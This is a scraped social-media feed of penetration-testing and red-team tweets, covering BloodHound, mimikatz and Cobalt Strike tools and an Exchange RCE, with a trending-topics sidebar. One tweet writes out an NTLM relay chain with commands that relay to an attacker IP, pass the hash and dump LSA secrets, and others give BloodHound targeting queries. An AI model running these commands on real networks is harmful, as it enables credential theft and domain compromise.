You might like
Bloomberg is looking for product security engineers, appsec engineers, security architects. VISA sponsorship. DM if interested.
Good wordlists are so important when discovering content on an asset. At @assetnote, we've built a wordlists site that updates itself on a monthly basis. For added value, we've included some of our best wordlists that we've manually collected too. wordlists.assetnote.io
I don't think that most people use Amass effectively, or understand how powerful it is. Here's how I personally use it. medium.com/@hakluke/haklu…
Here are the slides for The Bug Hunter's Methodology v4 Recon edition. Enjoy! drive.google.com/file/d/1aG_qqR…
Find all the users with the same name that belong to different domains: MATCH (u:User),(b:User) WHERE split(u.name, '@')[0] = split(b.name,'@')[0] AND u.domain <> b.domain AND toint(split(u.objectid, '-')[7]) > 1000 RETURN
#ActiveDirectory cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned is now possible with #DSInternals 4.2. github.com/MichaelGrafnet… Thanks @alexseigler.
CVE-2020-0688: REMOTE CODE EXECUTION ON MICROSOFT EXCHANGE SERVER THROUGH FIXED CRYPTOGRAPHIC KEYS - RCE with system privileges on all exchange server 😱 #infosec #pentest #redteam thezdi.com/blog/2020/2/24…
#BloodHound 3.0 is here! BloodHound: bit.ly/GetBloodHound Blog: bit.ly/3bu3chl Webinar deck: bit.ly/3837gTx Webinar recording coming soon #BloodHound 3.0 shirt: (all profits go to @MDAorg) customink.com/fundraising/th…
Getting shells with network-access only in <15 minutes: 1. Generate smb relay list with crackmapexec 2. Set up ntlmrelayx with smb2support and -socks 3. Fire up responder + bettercap (arp,dns+dhcpv6 spoofing) 4. ntlmrelayx sessions can be used with atexec and smbexec 5. Related:
Regex cheatsheet for the haters : github.com/geongeorge/i-h… cc @geongeorgek
Join me and @CptJesus on Tuesday, February 11th as we unveil #BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): specterops.zoom.us/webinar/regist…
New @OutflankNL tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.
Spray-AD, a new @OutflankNL Kerberos password spraying tool for Cobalt Strike that might come in handy when assessing Active Directory environments for weak passwords (generates event IDs 4771 instead of 4625). github.com/outflanknl/Spr…
Sharphound: "MATCH (c:Computer {unconstraineddelegation:true}) return c". Find all those boxes and use them for Print Spooler fun!
#EASY cme smb $hosts --gen-relay-list relay.txt mitm6 -i eth0 -d $domain ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt extract "Admin" hash cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa cp /root/.cme/logs/*.secrets |sort -u extract DA cred
I just pushed a new #mimikatz update, with more DPAPI & Crypto stuff inside > github.com/gentilkiwi/mim… 'cause you know, who don't love moaaaar credentials?
Imcat: shows images in your terminal directly with ANSI colors, resizing to the width. Super simple, super useful. github.com/stolk/imcat
I wrote up a quick POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post => mdsec.co.uk/2019/11/rdpthi…) using EasyHook and Donut ☠️🖥️. More details on GitHub => github.com/FuzzySecurity/…
Red Team Operations video series with Cobalt Strike 4.0 looks *amazing*. youtube.com/playlist?list=…
United States Trends
- 1. Rosalina 39.7K posts
- 2. Bowser Jr 13K posts
- 3. Jeffrey Epstein 90.6K posts
- 4. $SENS $0.70 Senseonics CGM N/A
- 5. $LMT $450.50 Lockheed F-35 N/A
- 6. $APDN $0.20 Applied DNA N/A
- 7. #NASDAQ_MYNZ N/A
- 8. Michael Wolff 6,282 posts
- 9. Virginia Giuffre 7,485 posts
- 10. H-1B 73.2K posts
- 11. Marvin Harrison Jr. N/A
- 12. Jameis 5,551 posts
- 13. AJ Brown 5,460 posts
- 14. Mario Galaxy 89.2K posts
- 15. #wednesdaymotivation 5,452 posts
- 16. House Democrats 43.1K posts
- 17. Captain Marvel 2,437 posts
- 18. Luigi 10.5K posts
- 19. Humanity 96.9K posts
- 20. Benny Safdie 5,303 posts
Something went wrong.
Something went wrong.